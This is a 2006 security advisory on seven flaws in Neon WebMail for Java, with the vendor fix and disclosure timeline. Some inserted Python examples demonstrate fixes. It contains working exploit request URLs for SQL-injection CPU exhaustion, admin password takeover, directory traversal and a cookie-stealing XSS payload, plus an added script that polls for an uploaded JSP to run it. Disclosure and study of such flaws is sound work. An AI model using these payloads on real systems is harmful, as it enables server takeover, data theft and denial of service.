vuln.sg Vulnerability Research Advisory

Neon WebMail for Java Multiple Vulnerabilities

by Tan Chew Keong
Release Date: 2006-09-20


Summary

Seven vulnerabilities have been found in Neon WebMail for Java. When exploited, they allow execution of arbitrary JSP code on the server, escalation of a user's privileges, manipulation of other users' emails and account information, disclosure of files on the server, and potentially a DoS through heavy CPU utilisation by the MySQL server.


Tested Versions

Neon WebMail for Java version 5.06 and 5.07 (build.200607050)


Details

This advisory discloses 7 vulnerabilities found in Neon WebMail for Java.

1) JSP File Upload and Execution

The default configuration stores users' email attachments under their original filename and extension in "/neonwebmail/users/username/YYYYMMDD/file.ext". Because this directory is served directly by Tomcat, JSP code can be executed on the server by sending a user an email with a JSP file attached.

This can be exploited in three ways.


(a) By Unauthenticated Users (when at least one user's email address is known)

Send an email with a ".JSP" file attachment (e.g. file.jsp) to a user. When the user opens the email in Neon WebMail, the attachment is saved under its original filename to "/neonwebmail/users/username/YYYYMMDD/". Requesting "http://[host]:8080/neonwebmail/users/username/YYYYMMDD/file.jsp" then executes the JSP code.

(b) By Authenticated Users (method 1)

An authenticated user can simply send himself a mail with a ".JSP" file attached. A copy of the mail ends up in the user's Sent folder and a copy of the attachment in "/neonwebmail/users/username/YYYYMMDD/".

(c) By Authenticated Users (method 2) IF THE SMTP SERVER IS NOT PROPERLY CONFIGURED

When an authenticated user composes an email with attachments in Neon WebMail, the attachment files are temporarily saved to "/neonwebmail/users/username/YYYYMMDD/" under their original filenames. These files are subsequently deleted IF THE SMTP SERVER IS NOT REACHABLE (i.e. when the send fails). However, the files can be requested before they are deleted, which executes the JSP code in a ".JSP" attachment.

NOTE: The attachment files are deleted quickly, but a program that repeatedly requests "http://[host]:8080/neonwebmail/users/username/YYYYMMDD/attachment.jsp" at short intervals will catch them. Deletion can also be slowed down by uploading several large attachments in the same composed email.

The email form allows up to 3 file attachments in one POST request. First, compose an email with the malicious ".JSP" file as the first attachment and a large file (1 MB or more) as the second. Next, start the program that polls for the malicious JSP file. Finally, submit the email. The ".JSP" file submitted as the first attachment is executed.
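The polling program the note above describes, as an added example; it is not part of the original advisory and not the author's code. The host, username and attachment name are placeholders, the URL layout follows the attachment path given above, and the date defaults to today's YYYYMMDD. The fetcher is injectable so the loop can be exercised without a live target:

```python
import time
import urllib.error
import urllib.request

# Placeholders (assumed); the IP follows the advisory's examples.
HOST = "192.168.1.64:8080"
USERNAME = "username"
ATTACHMENT = "attachment.jsp"


def attachment_url(host, username, filename, date=None):
    """Build the URL under which a saved attachment is served:
    /neonwebmail/users/<user>/<YYYYMMDD>/<file>. Date defaults to today."""
    if date is None:
        date = time.strftime("%Y%m%d")
    return "http://%s/neonwebmail/users/%s/%s/%s" % (host, username, date, filename)


def http_fetch(url, timeout=2.0):
    """Return (status, body); status is None when the server is unreachable."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, b""
    except (urllib.error.URLError, OSError):
        return None, b""


def poll_until_hit(url, fetch=http_fetch, interval=0.05, max_attempts=2000):
    """Request url repeatedly until a 200 arrives, i.e. the JSP ran before the
    temporary attachment was deleted. Returns (attempt_number, body), or
    (None, b"") if the window closed (404s only) before max_attempts."""
    for attempt in range(1, max_attempts + 1):
        status, body = fetch(url)
        if status == 200:
            return attempt, body
        if interval:
            time.sleep(interval)
    return None, b""


if __name__ == "__main__":
    # Start this first, then submit the composed email from the browser.
    url = attachment_url(HOST, USERNAME, ATTACHMENT)
    print("polling", url)
    hit, body = poll_until_hit(url)
    if hit is None:
        print("no hit: file was deleted before any request reached it")
    else:
        print("hit on attempt", hit, "first bytes:", body[:200])
```

The poll interval matters more than the attempt count: the window is the time Tomcat needs to fail the SMTP delivery and unlink the files, so an interval well under that (tens of milliseconds) with a large second attachment, as the note suggests, is what makes the race winnable.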

 

2) "updatemail" Servlet Arbitrary Email Manipulation

The "updatemail" servlet does not check that the mail being moved belongs to the requesting user when handling requests to move mails from one folder to another. A malicious user can therefore move another user's emails to a non-existent folder, making those mails appear "missing".

Example:


(a) To move Mail ID = 1 to the Trash Folder (Folder ID = -9):

NOTE: This assumes that a mail with ID = 1 exists. Mail ID = 1 may be an email belonging to another user. Mails are assigned increasing ID numbers.

http://192.168.1.64:8080/neonwebmail/updatemail?ID=1&getpost=get&folderid=-1&tofolderid=-9&status=1&execute=move

(b) Move Mail ID = 1 from Trash Folder (Folder ID = -9) to non-existing folder (Folder ID = 100):

http://192.168.1.64:8080/neonwebmail/updatemail?ID=1&getpost=get&folderid=-9&tofolderid=100&status=1&execute=move

NOTE: The victim can only read the moved mails by requesting that folder number directly.

 

3) "addrlist" Servlet SQL Injection Vulnerability

SQL injection is possible through the "adr_sortkey" and "adr_sortkey_desc" parameters, which are used as column names, without sanitisation, in the ORDER BY clause of a SELECT query in the "DB_ADDR_BOOK" class.

If MySQL is the backend database, this can be exploited to make the mysqld process consume a large amount of CPU time.

NOTE: In order to exploit this, the user must have at least one entry in his address book.


Example:

http://192.168.1.64:8080/neonwebmail/addrlist?PAGE=1&sysid=0&adr_sortkey=rand(benchmark(1000000000000, sha1('123456781234567812345678')))&adr_sortkey_desc=

This generates the following manipulated query:

SELECT * FROM T_ADDR_BOOK WHERE ID = 'username' ORDER BY ID,rand(benchmark(1000000000000,sha1('123456781234567812345678'))),SYSID DESC

 

4) "maillist" Servlet SQL Injection Vulnerability

SQL injection is possible through the "sortkey" and "sortkey_desc" parameters, which are used as column names, without sanitisation, in the ORDER BY clause of a SELECT query in the "DB_MAIL_DATA" class.

If MySQL is the backend database, this can be exploited to make the mysqld process consume a large amount of CPU time.

NOTE: In order to exploit this, the user must have at least one mail in his INBOX, or in the mail folder indicated by the "folderid" parameter in the malicious query.


Example:

http://192.168.1.64:8080/neonwebmail/maillist?getpost=get&PAGE=1&folderid=-1&sysid=0&sortkey=SENDER, rand(benchmark(1000000000000,sha1('123456781234567812345678')))&sortkey_desc=&sendkind=&searchlist=

This generates the following manipulated query:

SELECT T.* FROM T_MAIL_DATA T WHERE T.ID = 'username' AND (T.ISTRASH = '0' OR T.ISTRASH IS NULL) AND T.FOLDERID = -1 ORDER BY T.ID,T.SENDER,rand(benchmark(1000000000000,sha1('123456781234567812345678'))),T.SYSID DESC ,T.GETPOST
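Added example covering both the "addrlist" and "maillist" injections above; it is not from the original advisory or the product's code. It reconstructs the concatenation the advisory describes for the addrlist query beside an allow-list check, which is the usual fix because ORDER BY column names cannot be bound as query parameters. The column set for T_ADDR_BOOK is assumed. SQLite stands in for MySQL, so the benchmark() payload is only shown as the generated query string, and a harmless injected expression is run instead to show that whatever lands in ORDER BY is evaluated by the engine:

```python
import re
import sqlite3

# Assumed column set for T_ADDR_BOOK; the advisory only shows ID and SYSID.
ADDR_BOOK_SORT_COLUMNS = {"ID", "SYSID", "NAME", "EMAIL"}

# The advisory's MySQL payload for adr_sortkey.
MYSQL_PAYLOAD = "rand(benchmark(1000000000000,sha1('123456781234567812345678')))"


def build_addrlist_query_vulnerable(adr_sortkey, adr_sortkey_desc):
    """Reconstruction of the concatenation the advisory describes: both request
    parameters land verbatim in ORDER BY, so any SQL expression is accepted.
    The username is bound with '?' here; the advisory's query inlines it."""
    order = "ID," + adr_sortkey
    if adr_sortkey_desc:
        order += " " + adr_sortkey_desc
    return "SELECT * FROM T_ADDR_BOOK WHERE ID = ? ORDER BY %s,SYSID DESC" % order


def safe_sort_column(param, allowed):
    """Allow-list check for an identifier that cannot be parameterised:
    it must look like a bare column name AND be one of the known columns."""
    name = param.strip().upper()
    if not re.fullmatch(r"[A-Z_][A-Z0-9_]*", name) or name not in allowed:
        raise ValueError("rejected sort key: %r" % param)
    return name


def build_addrlist_query_fixed(adr_sortkey, adr_sortkey_desc):
    """Same query shape, but only a vetted column and a fixed keyword are spliced in;
    the direction parameter is reduced to a boolean instead of being copied."""
    col = safe_sort_column(adr_sortkey, ADDR_BOOK_SORT_COLUMNS)
    direction = "DESC" if adr_sortkey_desc else "ASC"
    return ("SELECT * FROM T_ADDR_BOOK WHERE ID = ? ORDER BY ID,%s %s,SYSID DESC"
            % (col, direction))


def run_against_sqlite(query, user="username"):
    """Execute the query against a constructed in-memory table. SQLite has no
    benchmark(), but it still evaluates whatever expression was spliced in."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE T_ADDR_BOOK (ID TEXT, SYSID INTEGER, NAME TEXT, EMAIL TEXT)")
    con.executemany("INSERT INTO T_ADDR_BOOK VALUES (?,?,?,?)", [
        ("username", 1, "Bob", "bob@example.invalid"),      # constructed rows
        ("username", 2, "Alice", "alice@example.invalid"),
        ("other", 3, "Eve", "eve@example.invalid"),
    ])
    rows = con.execute(query, (user,)).fetchall()
    con.close()
    return rows


if __name__ == "__main__":
    print(build_addrlist_query_vulnerable(MYSQL_PAYLOAD, ""))
    # An injected expression (random()) is accepted and evaluated per row:
    print(run_against_sqlite(build_addrlist_query_vulnerable("NAME,random()", "")))
    print(run_against_sqlite(build_addrlist_query_fixed("NAME", "")))
    try:
        build_addrlist_query_fixed(MYSQL_PAYLOAD, "")
    except ValueError as err:
        print("fixed builder:", err)
```

The same allow-list applies to "sortkey" on the maillist servlet with the T_MAIL_DATA column set; the point in both cases is that the servlet must map the request value onto a column it already knows, never copy it into the SQL text.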

 

5) "updateuser" Servlet Parameter Manipulation

The "updateuser" servlet lets a user update his Personal Profile settings. It does not verify that the "in_id" parameter (user id) matches the logged-in user before applying the supplied data, so ANY user's Personal Profile settings can be updated.

For example, while logged in as a NON-ADMIN user, it is possible to:


(a) Change the "admin" user's password to "hacked" via the following request.

http://192.168.1.64:8080/neonwebmail/updateuser?in_id=admin&in_pass=hacked&in_name=admin&in_admin=1&in_showmailcount=10&in_usecss=1&in_autopoptime=5&in_replysign=&in_isquotation=1&in_formwidth=50&exe=update

(b) Give the "guest" user admin privileges via the following request.

http://192.168.1.64:8080/neonwebmail/updateuser?in_id=guest&in_pass=guest&in_name=guest&in_admin=1&in_showmailcount=20&in_usecss=1&in_autopoptime=5&in_poppop=1&in_replysign=&in_formwidth=80&exe=update

(c) View the "admin" user's Personal Profile settings (including the password) via the following request.

http://192.168.1.64:8080/neonwebmail/updateuser?in_id=admin&exe=read

(d) Add an administrative user "super" via the following request.

http://192.168.1.64:8080/neonwebmail/updateuser?in_id=super&in_pass=super&in_name=super&in_admin=1&in_showmailcount=10&in_usecss=1&in_autopoptime=5&in_replysign=&in_isquotation=1&in_formwidth=50&exe=insert

(e) Delete arbitrary users, e.g. "super", via the following request.

http://192.168.1.64:8080/neonwebmail/updateuser?in_id=super&exe=delete

(f) Inject JavaScript into the "admin" user's "Name" field via the following request.

http://192.168.1.64:8080/neonwebmail/updateuser?in_id=admin&in_pass=hacked&in_name=<script>alert(document.cookie);</script>&in_admin=1&in_showmailcount=10&in_usecss=1&in_autopoptime=5&in_replysign=&in_isquotation=1&in_formwidth=50&exe=update

 

6) "downloadfile" Servlet Arbitrary File Disclosure Vulnerability

The "downloadfile" servlet lets a user download his/her email attachments. Directory traversal is possible through the "savefolder" and "savefilename" parameters, allowing an authenticated user to retrieve any file readable by the application server.

http://192.168.1.64:8080/neonwebmail/downloadfile?filename=filename.ext&savefolder=[traversal]&savefilename=[traversal]


Examples:

http://192.168.1.64:8080/neonwebmail/downloadfile?filename=filename.ext&savefolder=anything&savefilename=/../../../../../../../../../boot.ini

http://192.168.1.64:8080/neonwebmail/downloadfile?filename=filename.ext&savefolder=/../../../../../../../../../boot.ini&savefilename=

http://192.168.1.64:8080/neonwebmail/downloadfile?filename=filename.ext&savefolder=/../../../../../../../../../&savefilename=boot.ini
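Added example, not the product's code, showing why the three payloads above work and the check that stops them. The advisory does not show how the servlet combines "savefolder" and "savefilename", so the naive join below is an assumption, and the per-user attachment directory is a placeholder path:

```python
import os

# Placeholder per-user attachment directory (assumed layout from the advisory).
USER_DIR = "/opt/neonwebmail/users/username"

# The advisory's three payloads, as (savefolder, savefilename) pairs.
TRAVERSAL_PAYLOADS = [
    ("anything", "/../../../../../../../../../boot.ini"),
    ("/../../../../../../../../../boot.ini", ""),
    ("/../../../../../../../../../", "boot.ini"),
]


def attachment_path_vulnerable(user_dir, savefolder, savefilename):
    """Assumed naive join. os.path.join, like java.io.File(parent, child) with an
    absolute child, discards everything before an absolute component, and the
    '..' segments are never checked, so the result lands wherever the client says."""
    return os.path.normpath(os.path.join(user_dir, savefolder, savefilename))


def attachment_path_safe(user_dir, savefolder, savefilename):
    """Canonicalise the candidate and confirm it is still strictly inside user_dir.
    One containment check covers '..', leading slashes and symlink escapes."""
    base = os.path.realpath(user_dir)
    for part in (savefolder, savefilename):
        if "\x00" in part:
            raise ValueError("NUL byte in path component")
    # Strip leading separators so an absolute component cannot replace the base.
    candidate = os.path.realpath(os.path.join(
        base, savefolder.lstrip("/\\"), savefilename.lstrip("/\\")))
    if not candidate.startswith(base + os.sep):
        raise PermissionError("path escapes attachment directory: %r" % candidate)
    return candidate


def classify_payloads(user_dir, payloads):
    """Return, per payload, what the naive join resolves to and whether the
    hardened resolver rejects it. Useful as a regression check after a fix."""
    results = []
    for folder, name in payloads:
        naive = attachment_path_vulnerable(user_dir, folder, name)
        try:
            attachment_path_safe(user_dir, folder, name)
            rejected = False
        except PermissionError:
            rejected = True
        results.append((naive, rejected))
    return results


if __name__ == "__main__":
    for (folder, name), (naive, rejected) in zip(TRAVERSAL_PAYLOADS,
                                                 classify_payloads(USER_DIR, TRAVERSAL_PAYLOADS)):
        print("savefolder=%r savefilename=%r -> naive %s, safe resolver %s"
              % (folder, name, naive, "rejected" if rejected else "ACCEPTED"))
    print(attachment_path_safe(USER_DIR, "20060704", "file.ext"))
```

Note that rejecting "../" by string matching is not enough: the second and third payloads put the traversal in a different parameter, and URL-encoded or mixed-separator variants are easy to miss. Resolving first and then comparing against the canonical base directory catches all of them in the same place.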

 

7) User's name Field Script Insertion (XSS)

Under the "Settings" tab in Neon WebMail, a user can set his name in his Personal Profile settings (the "in_name" parameter). This field accepts JavaScript.

The user's name is displayed when the administrative user views the list of all users, so the script executes in the context of the administrative user's session and can, for example, steal the administrative user's session cookie.


Example:

a) Log on as a normal user and enter <script>alert(document.cookie);</script> in the "Name" field.
b) Log on as the administrative user and view the list of all users.

 


Patch / Workaround

According to the vendor, the vulnerabilities have been fixed in version 5.08. Update to the fixed version.


Disclosure Timeline

2006-07-04 - Vulnerability Discovered.
2006-07-12 - Initial Vendor Notification.
2006-07-13 - Initial Vendor Reply.
2006-08-09 - Vendor Reminder Sent.
2006-08-09 - Vendor replied that fixed version will be released in late August.
2006-09-01 - Vendor Reminder Sent.
2006-09-05 - Vendor Reminder Sent.
2006-09-17 - Vendor Released Fixed Version.
2006-09-20 - Public Release.


Contact
For further enquiries, comments, suggestions or bug reports, simply email them to